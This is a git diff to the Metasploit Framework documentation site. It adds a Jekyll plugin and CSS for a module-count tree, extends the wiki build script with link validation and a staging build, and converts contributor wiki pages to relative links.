@@ -0,0 +1,159 @@
+require 'jekyll'
+require 'json'
+require 'pathname'
+
+#
+# Helper class for extracting information related to Metasploit framework's stats
+#
+class MetasploitStats
+  def total_module_count
+    modules.length
+  end
+
+  # @return [Hash<String, Integer>] A map of module type to the amount of modules
+  def module_counts
+    module_counts_by_type = modules.group_by { |mod| mod['type'].to_s }.transform_values { |mods| mods.count }.sort_by(&:first).to_h
+    module_counts_by_type
+  end
+
+  # @return [Array<Hash<String, Hash>>] A nested array of module metadata, containing at least the keys :name, :total, :children
+  def nested_module_counts
+    create_nested_module_counts(modules)
+  end
+
+  protected
+
+  # @param [Array<Hash>] modules
+  # @param [String] parent_path The parent path to track the nesting depth when called recursively
+  #   i.e. auxiliary, then auxiliary/admin, then auxiliary/admin/foo, etc
+  def create_nested_module_counts(modules, parent_path = '')
+    # Group the modules by their prefix, i.e. auxiliary/payload/encoder/etc
+    top_level_buckets = modules.select { |mod| mod['fullname'].start_with?(parent_path) }.group_by do |mod|
+      remaining_paths = mod['fullname'].gsub(parent_path.empty? ? '' : %r{^#{parent_path}/}, '').split('/')
+      remaining_paths[0]
+    end.sort.to_h
+
+    top_level_buckets.map do |(prefix, children)|
+      current_path = parent_path.empty? ? prefix : "#{parent_path}/#{prefix}"
+      mod = modules_by_fullname[current_path]
+      {
+        name: prefix,
+        total: children.count,
+        module_fullname: mod ?  mod['fullname'] : nil,
+        module_path: mod ? mod['path'] : nil,
+        children: mod.nil? ? create_nested_module_counts(children, current_path) : []
+      }
+    end
+  end
+
+  # @return [Array<Hash>] An array of Hashes containing each Metasploit module's metadata
+  def modules
+    return @modules if @modules
+
+    module_metadata_path = '../db/modules_metadata_base.json'
+    unless File.exist?(module_metadata_path)
+      raise "Unable to find Metasploit module data, expected it to be at #{module_metadata_path}"
+    end
+
+    @modules = JSON.parse(File.binread(module_metadata_path)).values
+    @modules
+  end
+
+  # @return [Hash<String, Hash>] A mapping of module name to Metasploit module metadata
+  def modules_by_fullname
+    @modules_by_fullname ||= @modules.each_with_object({}) do |mod, hash|
+      fullname = mod['fullname']
+      hash[fullname] = mod
+    end
+  end
+end
+
+# Custom liquid filter implementation for visualizing nested Metasploit module metadata
+#
+# Intended usage:
+# {{ site.metasploit_nested_module_counts | module_tree }}
+module ModuleFilter
+  # @param [Array<Hash>] modules The array of Metasploit cache information
+  # @return [String] The module tree HTML representation of the given modules
+  def module_tree(modules, title = 'Modules', show_controls = false)
+    rendered_children = render_modules(modules)
+    controls = <<~EOF
+        <div class="module-controls">
+            <span><a href="#" data-expand-all>Expand All</a></span>
+            <span><a href="#" data-collapse-all>Collapse All</a></span>
+        </div>
+    EOF
+
+    <<~EOF
+      <div class="module-list">
+        #{show_controls ? controls : ''}
+
+        <ul class="module-structure">
+          <li class="folder"><a href=\"#\"><div class=\"target\">#{title}</div></a>
+            <ul class="open">
+              #{rendered_children}
+            </ul>
+          </li>
+        </ul>
+      </div>
+    EOF
+  end
+
+  module_function
+
+  # @param [Array<Hash>] modules The array of Metasploit cache information
+  # @return [String] The rendered tree HTML representation of the given modules
+  def render_modules(modules)
+    modules.map do |mod|
+      classes = render_child_modules?(mod) ? ' class="folder"' : ''
+      result = "<li#{classes}>#{heading_for_mod(mod)}"
+      if render_child_modules?(mod)
+        result += "\n<ul>#{render_modules(mod[:children].sort_by { |mod| "#{render_child_modules?(mod) ? 0 : 1}-#{mod[:name]}" })}</ul>\n"
+      end
+      result += "</li>"
+      result
+    end.join("\n")
+  end
+
+  # @param [Hash] mod The module metadata object
+  # @return [String] Human readable string for a module list such as `- <a>Auxiliary (1234)</a>` or `- Other (50)`
+  def heading_for_mod(mod)
+    if render_child_modules?(mod)
+      "<a href=\"#\"><div class=\"target\">#{mod[:name]} (#{mod[:total]})</div></a>"
+    else
+      config = Jekyll.sites.first.config
+      # Preference linking to module documentation over the module implementation
+      module_docs_path = Pathname.new("documentation").join(mod[:module_path].gsub(/^\//, '')).sub_ext(".md")
+      link_path = File.exist?(File.join('..', module_docs_path)) ? "/#{module_docs_path}" : mod[:module_path]
+      docs_link = "#{config['gh_edit_repository']}/#{config['gh_edit_view_mode']}/#{config['gh_edit_branch']}#{link_path}"
+      "<a href=\"#{docs_link}\" target=\"_blank\"><div class=\"target\">#{mod[:module_fullname]}</div></a>"
+    end
+  end
+
+  # @param [Hash] mod The module metadata object
+  # @return [TrueClass, FalseClass]
+  def render_child_modules?(mod)
+    mod[:children].length >= 1 && mod[:module_path].nil?
+  end
+end
+
+# Register the Liquid filter so any Jekyll page can render module information
+Liquid::Template.register_filter(ModuleFilter)
+
+# Register the site initialization hook to populate global site information so any Jekyll page can access Metasploit stats information
+Jekyll::Hooks.register :site, :after_init do |site|
+  begin
+    Jekyll.logger.info 'Calculating module stats'
+
+    metasploit_stats = MetasploitStats.new
+
+    site.config['metasploit_total_module_count'] = metasploit_stats.total_module_count
+    site.config['metasploit_module_counts'] = metasploit_stats.module_counts
+    site.config['metasploit_nested_module_counts'] = metasploit_stats.nested_module_counts
+
+    Jekyll.logger.info 'Finished calculating module stats'
+  rescue
+    Jekyll.logger.error "Unable to to extractMetasploit stats"
+    raise
+  end
+end
@@ -0,0 +1,133 @@
+---
+---
+
+#main-content p {
+    text-align: justify;
+}
+
+/* Color highlighting for msf console text */
+.language-mermaid .label {
+    text-transform: inherit;
+}
+
+.language-msf .zp {
+    text-decoration: underline;
+}
+
+.language-msf .ze {
+    color: #960050;
+}
+
+.language-msf .zg {
+    color: #859900;
+}
+
+.language-msf .zs {
+    color: #268bd2;
+}
+
+.language-msf .zw {
+    color: orange;
+}
+
+/* Module overview styles */
+
+.module-structure li::before {
+    content: ' ' !important;
+}
+
+.module-structure a {
+    height: 100%;
+    padding: 0.2rem;
+    background-image: none;
+    overflow: initial;
+    display: inline-block;
+    width: 90%;
+}
+
+.module-controls {
+    line-height: 0;
+    border-bottom: 1px solid #ddd;
+}
+
+.module-controls a {
+    line-height: 1;
+    padding: 0.5rem;
+    display: inline-block;
+}
+
+.module-controls span {
+    display: inline-block;
+}
+
+.module-structure a, .module-structure a:hover {
+    background-image: none;
+}
+
+.module-structure a .target {
+    pointer-events: none;
+    display: inline-block;
+    text-decoration: none;
+}
+
+.module-structure a:hover .target {
+    background-image: linear-gradient(rgba(114, 83, 237, 0.45) 0%, rgba(114, 83, 237, 0.45) 100%);
+    background-repeat: repeat-x;
+    background-position: 0 100%;
+    background-size: 1px 1px;
+}
+
+.module-structure {
+    line-height: 2rem;
+}
+
+/* visual indentation lines */
+.module-structure ul {
+    margin-left: 7px !important;
+    padding-left: 20px !important;
+    border-left: 1px dashed #d1d7de;
+}
+
+/* Never allow the top-most files/folders to be collapsed */
+.module-structure > li.folder > ul {
+    display: block;
+}
+
+.module-structure li p {
+    margin: 0;
+}
+
+.module-structure li {
+    margin: 0;
+    list-style: none;
+}
+
+.module-structure ul {
+    display: none;
+    margin: 0;
+}
+
+.module-structure ul.open {
+    display: block;
+}
+
+/* Default li style - files */
+.module-structure li::before {
+    background-image: url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' fill='%234158bf' viewBox='0 0 512 512'><path d='M320 464c8.8 0 16-7.2 16-16V160H256c-17.7 0-32-14.3-32-32V48H64c-8.8 0-16 7.2-16 16V448c0 8.8 7.2 16 16 16H320zM0 64C0 28.7 28.7 0 64 0H229.5c17 0 33.3 6.7 45.3 18.7l90.5 90.5c12 12 18.7 28.3 18.7 45.3V448c0 35.3-28.7 64-64 64H64c-35.3 0-64-28.7-64-64V64z'/></svg>");
+    background-repeat: no-repeat;
+    width: 1rem;
+    height: 1rem;
+    background-position: center top;
+    background-size: 90% auto;
+    margin-top: 0;
+    vertical-align: middle;
+    margin-left: initial !important;
+    margin-right: 0.5rem !important;
+    display: inline-block !important;
+    position: initial !important;
+}
+
+/* li style - folders */
+.module-structure li.folder::before {
+    background-image: url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' fill='%234158bf' viewBox='0 0 512 512'><path d='M64 480H448c35.3 0 64-28.7 64-64V160c0-35.3-28.7-64-64-64H288c-10.1 0-19.6-4.7-25.6-12.8L243.2 57.6C231.1 41.5 212.1 32 192 32H64C28.7 32 0 60.7 0 96V416c0 35.3 28.7 64 64 64z'/></svg>");
+}
@@ -2,22 +2,26 @@ require 'fileutils'
 require 'uri'
 require 'open3'
 require 'optparse'
+require 'did_you_mean'
+require 'kramdown'
 require_relative './navigation'

-# Temporary build module to help migrate and build the Metasploit wiki https://github.com/rapid7/metasploit-framework/wiki into a format
-# supported by Jekyll, as well as creating a hierarchical folder structure for nested documentation
+# This build module was used to migrate the old Metasploit wiki https://github.com/rapid7/metasploit-framework/wiki into a format
+# supported by Jekyll. Jekyll was chosen as it was written in Ruby, which should reduce the barrier to entry for contributions.
+#
+# The build script took the flatlist of markdown files from the wiki, and converted them into the hierarchical folder structure
+# for nested documentation. This configuration is defined in `navigation.rb`
+#
+# In the future a different site generator could be used, but it should be possible to use this build script again to migrate to a new format
 #
 # For now the doc folder only contains the key files for building the docs site and no content. The content is created on demand
-# from the metasploit-framework wiki on each build
-#
-# In the future, the markdown files will be committed directly to the metasploit-framework directory, the wiki history will be
-# merged with metasploit-framework, and the old wiki will no longer be updated.
+# from the `metasploit-framework.wiki` folder on each build
 module Build
  # The metasploit-framework.wiki files that are committed to Metasploit framework's repository
  WIKI_PATH = 'metasploit-framework.wiki'.freeze
-  # A locally cloned version of https://github.com/rapid7/metasploit-framework/wiki
+  # A locally cloned version of https://github.com/rapid7/metasploit-framework/wiki - should no longer be required for normal workflows
  OLD_WIKI_PATH = 'metasploit-framework.wiki.old'.freeze
-  PRODUCTION_BUILD_ARTIFACTS = '_site'.freeze
+  RELEASE_BUILD_ARTIFACTS = '_site'.freeze

  # For now we Git clone the existing metasploit wiki and generate the Jekyll markdown files
  # for each build. This allows changes to be made to the existing wiki until it's migrated
@@ -46,13 +50,18 @@ module Build
    def validate!
      configured_paths = all_file_paths
      missing_paths = available_paths.map { |path| path.gsub("#{WIKI_PATH}/", '') } - ignored_paths - existing_docs - configured_paths
-      raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')}" if missing_paths.any?
+      raise ConfigValidationError, "Unhandled paths #{missing_paths.join(', ')} - add navigation entries to navigation.rb for these files" if missing_paths.any?

      each do |page|
        page_keys = page.keys
        allowed_keys = %i[old_wiki_path path new_base_name nav_order title new_path folder children has_children parents]
        invalid_keys = page_keys - allowed_keys
-        raise ConfigValidationError, "#{page} had invalid keys #{invalid_keys.join(', ')}" if invalid_keys.any?
+
+        suggestion = DidYouMean::SpellChecker.new(dictionary: allowed_keys).correct(invalid_keys[0]).first
+        error = "#{page} had invalid keys #{invalid_keys.join(', ')}."
+        error += " Did you mean #{suggestion}?" if suggestion
+
+        raise ConfigValidationError, error  if invalid_keys.any?
      end

      # Ensure unique folder names
@@ -150,6 +159,10 @@ module Build
      @links = {}
    end

+    def syntax_errors_for(markdown)
+      MarkdownLinkSyntaxVerifier.errors_for(markdown)
+    end
+
    def extract(markdown)
      extracted_absolute_wiki_links = extract_absolute_wiki_links(markdown)
      @links = @links.merge(extracted_absolute_wiki_links)
@@ -179,16 +192,22 @@ module Build
      @config.enum_for(:each).map { |page| page }
    end

-    # scans for absolute links to the old wiki such as 'https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service'
+    # scans for absolute links to the old wiki such as 'https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html'
    def extract_absolute_wiki_links(markdown)
      new_links = {}

-      markdown.scan(%r{(https?://github.com/rapid7/metasploit-framework/wiki/([\w().%_-]+))}) do |full_match, old_path|
+      markdown.scan(%r{(https?://github.com/rapid7/metasploit-framework/wiki/([\w().%_#-]+))}) do |full_match, old_path|
        full_match = full_match.gsub(/[).]+$/, '')
        old_path = URI.decode_www_form_component(old_path.gsub(/[).]+$/, ''))

-        new_path = new_path_for(old_path)
-        replacement = "{% link docs/#{new_path} %}"
+        begin
+          old_path_anchor = URI.parse(old_path).fragment
+        rescue URI::InvalidURIError
+          old_path_anchor = nil
+        end
+
+        new_path = new_path_for(old_path, old_path_anchor)
+        replacement = "{% link docs/#{new_path} %}#{old_path_anchor ? "##{old_path_anchor}" : ""}"

        link = {
          full_match: full_match,
@@ -208,18 +227,26 @@ module Build
    #   '[[Custom name|Relative Path]]'
    #   '[[Custom name|relative-path]]'
    #   '[[Custom name|./relative-path.md]]'
+    #   '[[Custom name|./relative-path.md#section-anchor-to-link-to]]'
+    # Note that the page target resource file is validated for existence at build time - but the section anchors are not
    def extract_relative_links(markdown)
      existing_links = @links
      new_links = {}
-      markdown.scan(/(\[\[([\w\/_ '().:,-]+)(?:\|([\w\/_ '():,.-]+))?\]\])/) do |full_match, left, right|
+
+      markdown.scan(/(\[\[([\w\/_ '().:,-]+)(?:\|([\w\/_ '():,.#-]+))?\]\])/) do |full_match, left, right|
        old_path = (right || left)
-        new_path = new_path_for(old_path)
+        begin
+          old_path_anchor = URI.parse(old_path).fragment
+        rescue URI::InvalidURIError
+          old_path_anchor = nil
+        end
+        new_path = new_path_for(old_path, old_path_anchor)
        if existing_links[full_match] && existing_links[full_match][:new_path] != new_path
          raise "Link for #{full_match} previously resolved to #{existing_links[full_match][:new_path]}, but now resolves to #{new_path}"
        end

        link_text = left
-        replacement = "[#{link_text}]({% link docs/#{new_path} %})"
+        replacement = "[#{link_text}]({% link docs/#{new_path} %}#{old_path_anchor ? "##{old_path_anchor}" : ""})"

        link = {
          full_match: full_match,
@@ -236,18 +263,39 @@ module Build
      new_links
    end

-    def new_path_for(old_path)
-      old_path = old_path.gsub(' ', '-')
+    def new_path_for(old_path, old_path_anchor)
+      # Strip out any leading `./` or `/` before the relative path.
+      # This is needed for our later code that does additional filtering for
+      # potential ambiguity with absolute paths since those comparisons occur
+      # against filenames without the leading ./ and / parts.
+      old_path = old_path.gsub(/^[.\/]+/, '')
+
+      # Replace any spaces in the file name with - separators, then
+      # make replace anchors with an empty string.
+      old_path = old_path.gsub(' ', '-').gsub("##{old_path_anchor}", '')
+
      matched_pages = pages.select do |page|
        !page[:folder] &&
          (File.basename(page[:path]).downcase == "#{File.basename(old_path)}.md".downcase ||
            File.basename(page[:path]).downcase == "#{File.basename(old_path)}".downcase)
      end
      if matched_pages.empty?
-        raise "Missing path for #{old_path}"
+        raise "Link not found: #{old_path}"
      end
+      # Additional filter for absolute paths if there's potential ambiguity
      if matched_pages.count > 1
-        raise "Duplicate paths for #{old_path}"
+        refined_pages = matched_pages.select do |page|
+          !page[:folder] &&
+            (page[:path].downcase == "#{old_path}.md".downcase ||
+              page[:path].downcase == old_path.downcase)
+        end
+
+        if refined_pages.count != 1
+          page_paths = matched_pages.map { |page| page[:path] }
+          raise "Duplicate paths for #{old_path} - possible page paths found: #{page_paths}"
+        end
+
+        matched_pages = refined_pages
      end

      matched_pages.first.fetch(:new_path)
@@ -276,7 +324,11 @@ module Build
        '@zeroSteiner',
        '@harmj0y',
      ]
+      # These tags look like Github/Twitter handles, but are actually ruby/java code snippets
      ignored_tags = [
+        '@spid',
+        '@adf3',
+        '@LDAP-DC3',
        '@harmj0yDescription',
        '@phpsessid',
        '@http_client',
@@ -320,6 +372,68 @@ module Build
    end
  end

+  # Verifies that markdown links are not relative. Instead the Github wiki flavored syntax should be used.
+  #
+  # Example bad: `[Human readable text](./some-documentation-link)`
+  # Example good: `[[Human readable text|./some-documentation-link]]`
+  class MarkdownLinkSyntaxVerifier
+    # Detects the usage of bad syntax and returns an array of detected errors
+    #
+    # @param [String] markdown The markdown
+    # @return [Array<String>] An array of human readable errors that should be resolved
+    def self.errors_for(markdown)
+      document = Kramdown::Document.new(markdown)
+      document.to_validated_wiki_page
+      warnings = document.warnings.select { |warning| warning.start_with?(Kramdown::Converter::ValidatedWikiPage::WARNING_PREFIX) }
+      warnings
+    end
+
+    # Implementation detail: There doesn't seem to be a generic AST visitor pattern library for Ruby; We instead implement
+    # Kramdown's Markdown to HTML Converter API, override the link converter method, and warn on any invalid links that are identified.
+    # The {MarkdownLinkVerifier} will ignore the HTML result, and return any detected errors instead.
+    #
+    # https://kramdown.gettalong.org/rdoc/Kramdown/Converter/Html.html
+    class Kramdown::Converter::ValidatedWikiPage < Kramdown::Converter::Html
+      WARNING_PREFIX = '[WikiLinkValidation]'
+
+      def convert_a(el, indent)
+        link_href = el.attr['href']
+        if relative_link?(link_href)
+          link_text = el.children.map { |child| convert(child) }.join
+          warning "Invalid docs link syntax found on line #{el.options[:location]}: Invalid relative link #{link_href} found. Please use the syntax [[#{link_text}|#{link_href}]] instead"
+        end
+
+        if absolute_docs_link?(link_href)
+          begin
+            example_path = ".#{URI.parse(link_href).path}"
+          rescue URI::InvalidURIError
+            example_path = "./path-to-markdown-file"
+          end
+
+          link_text = el.children.map { |child| convert(child) }.join
+          warning "Invalid docs link syntax found on line #{el.options[:location]}: Invalid absolute link #{link_href} found. Please use relative links instead, i.e. [[#{link_text}|#{example_path}]] instead"
+        end
+
+        super
+      end
+
+      private
+
+      def warning(text)
+        super "#{WARNING_PREFIX} #{text}"
+      end
+
+      def relative_link?(link_path)
+        !(link_path.start_with?('http:') || link_path.start_with?('https:') || link_path.start_with?('mailto:') || link_path.start_with?('#'))
+      end
+
+      # @return [TrueClass, FalseClass] True if the link is to a Metasploit docs page that isn't either the root home page or the API site, otherwise false
+      def absolute_docs_link?(link_path)
+        link_path.include?('docs.metasploit.com') && !link_path.include?('docs.metasploit.com/api') && !(link_path == 'https://docs.metasploit.com/')
+      end
+    end
+  end
+
  # Parses a wiki page and can add/remove/update a deprecation notice
  class WikiDeprecationText
    MAINTAINER_MESSAGE_PREFIX = "<!-- Maintainers: "
@@ -368,7 +482,8 @@ module Build
          **page.slice(:title, :has_children, :nav_order),
          parent: (page[:parents][-1] || {})[:title],
          warning: "Do not modify this file directly. Please modify metasploit-framework/docs/metasploit-framework.wiki instead",
-          old_path: page[:path] ? File.join(WIKI_PATH, page[:path]) : "none - folder automatically generated"
+          old_path: page[:path] ? File.join(WIKI_PATH, page[:path]) : "none - folder automatically generated",
+          has_content: !page[:path].nil?
        }.compact

        page_config[:has_children] = true if page[:has_children]
@@ -382,7 +497,7 @@ module Build
        new_path = File.join(result_folder, page[:new_path])
        FileUtils.mkdir_p(File.dirname(new_path))

-        if page[:folder]
+        if page[:folder] && page[:path].nil?
          new_docs_content = preamble.rstrip + "\n"
        else
          old_path = File.join(WIKI_PATH, page[:path])
@@ -413,19 +528,31 @@ module Build

    def link_corrector_for(config)
      link_corrector = LinkCorrector.new(config)
+      errors = []
      config.each do |page|
-        unless page[:folder]
+        unless page[:path].nil?
          content = File.read(File.join(WIKI_PATH, page[:path]), encoding: Encoding::UTF_8)
+          syntax_errors = link_corrector.syntax_errors_for(content)
+          errors << { path: page[:path], messages: syntax_errors } if syntax_errors.any?
+
          link_corrector.extract(content)
        end
      end

+      if errors.any?
+        errors.each do |error|
+          $stderr.puts "[!] Error #{File.join(WIKI_PATH, error[:path])}:\n#{error[:messages].map { |message| "\t- #{message}\n" }.join}"
+        end
+
+        raise "Errors found in markdown syntax"
+      end
+
      link_corrector
    end
  end

-  # Serve the production build at http://127.0.0.1:4000/metasploit-framework/
-  class ProductionServer
+  # Serve the release build at http://127.0.0.1:4000/metasploit-framework/
+  class ReleaseBuildServer
    autoload :WEBrick, 'webrick'

    def self.run
@@ -434,7 +561,7 @@ module Build
          Port: 4000
        }
      )
-      server.mount('/', WEBrick::HTTPServlet::FileHandler, PRODUCTION_BUILD_ARTIFACTS)
+      server.mount('/', WEBrick::HTTPServlet::FileHandler, RELEASE_BUILD_ARTIFACTS)
      trap('INT') do
        server.shutdown
      rescue StandardError
@@ -539,11 +666,18 @@ module Build
    end

    if options[:production]
-      FileUtils.remove_dir(PRODUCTION_BUILD_ARTIFACTS, true)
+      FileUtils.remove_dir(RELEASE_BUILD_ARTIFACTS, true)
      run_command('JEKYLL_ENV=production bundle exec jekyll build')

      if options[:serve]
-        ProductionServer.run
+        ReleaseBuildServer.run
+      end
+    elsif options[:staging]
+      FileUtils.remove_dir(RELEASE_BUILD_ARTIFACTS, true)
+      run_command('JEKYLL_ENV=production bundle exec jekyll build --config _config.yml,_config_staging.yml')
+
+      if options[:serve]
+        ReleaseBuildServer.run
      end
    elsif options[:serve]
      run_command('bundle exec jekyll serve --config _config.yml,_config_development.yml --incremental')
@@ -567,6 +701,10 @@ if $PROGRAM_NAME == __FILE__
      options[:production] = production
    end

+    opts.on('--staging', 'Run a staging build for deploying to gh-pages') do |staging|
+      options[:staging] = staging
+    end
+
    opts.on('--serve', 'serve the docs site') do |serve|
      options[:serve] = serve
    end
@@ -590,6 +728,10 @@ if $PROGRAM_NAME == __FILE__
      options[:create_wiki_to_framework_migration_branch] = true
    end
  end
+  if ARGV.length == 0
+    puts options_parser.help
+    exit 1
+  end
  options_parser.parse!

  Build.run(options)
@@ -1,3 +1,3 @@
 View the latest API docs at:

-[https://rapid7.github.io/metasploit-framework/api/](https://rapid7.github.io/metasploit-framework/api/)
+[https://docs.metasploit.com/api/](https://docs.metasploit.com/api/)
@@ -1,12 +1,10 @@
-This page lists the keys in use by [Metasploit committers][msf-committers] and
+This page lists the keys in use by [[Metasploit committers|committer-rights]] and
 can be used to verify merge commits made to <https://github.com/rapid7/metasploit-framework>.

 # Keybase.io identities

 Keybase.io is used by Metasploit as an easy way to verify identities of committers. If you're a committer on metasploit-framework, and you need an invite, just ask.

-<sup>Altering this table's layout will almost certainly break [import-dev-keys.sh](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/import-dev-keys.sh), so please don't.</sup>
-
 | Github Username                                   | Keybase.io Username                                |
 | ------------------------------------------------- | -------------------------------------------------- |
 | [@adfoster-r7](https://github.com/adfoster-r7)    | [adfosterr7](https://keybase.io/adfosterr7)        |
@@ -78,7 +76,7 @@ Please select what kind of key you want:
   (4) RSA (sign only)
 Your selection? 4
 RSA keys may be between 1024 and 4096 bits long.
-What keysize do you want? (2048) 
+What keysize do you want? (2048)
 Requested keysize is 2048 bits
 Please specify how long the key should be valid.
         0 = key does not expire
@@ -96,7 +94,7 @@ from the Real Name, Comment and Email Address in this form:

 Real name: Dade Murphy
 Email address: dmurphy@thegibson.example
-Comment: 
+Comment:
 You selected this USER-ID:
    "Dade Murphy <dmurphy@thegibson.example>"

@@ -120,7 +118,6 @@ Enter passphrase: [...]

 Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.

-[msf-committers]:https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights
 [pro-sharing]:https://filippo.io/on-keybase-dot-io-and-encrypted-private-key-sharing/
 [con-sharing]:https://www.tbray.org/ongoing/When/201x/2014/03/19/Keybase#p-5
 [tracking]:https://github.com/keybase/keybase-issues/issues/100
@@ -2,7 +2,7 @@

 The term "Metasploit Committers" describes people who have direct write access to the [Rapid7 Metasploit-Framework fork](https://github.com/rapid7/metasploit-framework). These are the people who can land changes to this main fork of the Framework. However, it is not necessary to have committer rights in order to contribute to Metasploit. Much of our code comes from non-committers.

-We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) setup guide.
+We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] setup guide.

 Metasploit committers are a mix of [Rapid7](http://rapid7.com) employees and outside contributors. Anyone can become a contributor, with the following expectations:

@@ -24,7 +24,7 @@ If you reject a pull request, be clear in the pull request why it was rejected,

 Even if someone else approves of a pull request, and it is shown to be broken later, then it is still your responsibility to correct it. Make every effort to get a fix or revert in as soon as possible, whether you wrote the code, landed it, or approved it. Blame is shared equally.

-A list of committer public keys [is here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
+A list of committer public keys [[is here|./Committer-Keys.md]].

 # How to Gain Commit Rights

@@ -45,7 +45,7 @@ Breaches of trust in terms of malicious or malformed code, or the demonstration

 # Useful Links for Committers

-  * [http://r-7.co/MSF-DEV](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) is pretty much required reading.
+  * [[Setting Up a Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] is pretty much required reading.
  * So is [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md)
  * Check out the Apache Software Foundation's [Guide for Committers](https://www.apache.org/dev/committers). It's illuminating.
  * [Producing Open Source Software](http://www.producingoss.com/gl/) by Ken Fogel is a must-read.
@@ -358,7 +358,6 @@ Pulling it all together, we get a new `ftp_login` module that looks something li
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
 require 'metasploit/framework/credential_collection'
 require 'metasploit/framework/login_scanner/ftp'

@@ -472,4 +471,4 @@ class Metasploit3 < Msf::Auxiliary
    end
  end
 end
-```
+```
@@ -6,13 +6,13 @@ whilst also avoiding some common pitfalls and learning how some of our systems w

 ## Initial Steps and Important Notes
 The rest of this guide assumes you have already followed the steps at [Setting Up A Developer Environment](https://r-7.co/MSF-DEV) in order to get
-a fork of Metasploit set up and ready to run, and that you have added in your SSH keys 
-(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)), 
+a fork of Metasploit set up and ready to run, and that you have added in your SSH keys
+(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)),
 set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure.

 ## Getting the Latest Version of Metasploit Framework
 Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework.
-To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the 
+To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the
 Rapid7 remote, aka Rapid7's copy of the code. You can verify that `upstream` is set correctly by running `git remote get-url upstream`
 and verifying it is set to `git@github.com:rapid7/metasploit-framework.git`.

@@ -51,13 +51,13 @@ done when the code is ready to be landed into Metasploit Framework to help make

 ## Checking for Code Errors
 Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that
-all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards, 
+all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards,
 from the root of wherever you cloned your fork of Metasploit Framework to on disk, run `rubocop <path to your module from current directory>`.

 Specifying the `-a` parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix.
-In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running 
-this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is 
-complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you 
+In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running
+this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is
+complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you
 want, but it should mention RuboCop as it helps maintainers know what the commit is related to.

 As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes.
@@ -71,8 +71,8 @@ against your module code (if applicable), using `tools/dev/msftidy.rb <path to m
 if your module passed the tests. Try and fix any errors mentioned here.

 ## Writing Documentation
-The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information 
-on how to write module documentation at [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html).
+The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information
+on how to write module documentation at [[Writing Module Documentation|./Writing-Module-Documentation.md]].

 In general when writing documentation you will want to search for a similar documentation file under the `documentation`
 folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing
@@ -91,15 +91,15 @@ these may be okay to ignore depending on the context. A good example is if a lin
 safely ignored.

 ## Submitting Your Changes and Opening a PR
-Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which 
-branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this 
+Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which
+branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this
 branch's remote URL using `git remote get-url origin`. It should look something like `git@github.com:gwillcox-r7/metasploit-framework`
 with `gwillcox-r7` substituted for your username.

-Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch` 
-and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what 
-you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most 
-cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you 
+Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch`
+and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what
+you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most
+cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you
 start working with more complex situations. Note that if the branch pointing to your copy of the code is not named `origin`,
 replace the word `origin` in the command above with the name of the branch that does point to your copy of the code.

@@ -114,10 +114,10 @@ Compressing objects: 100% (8/8), done.
 Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done.
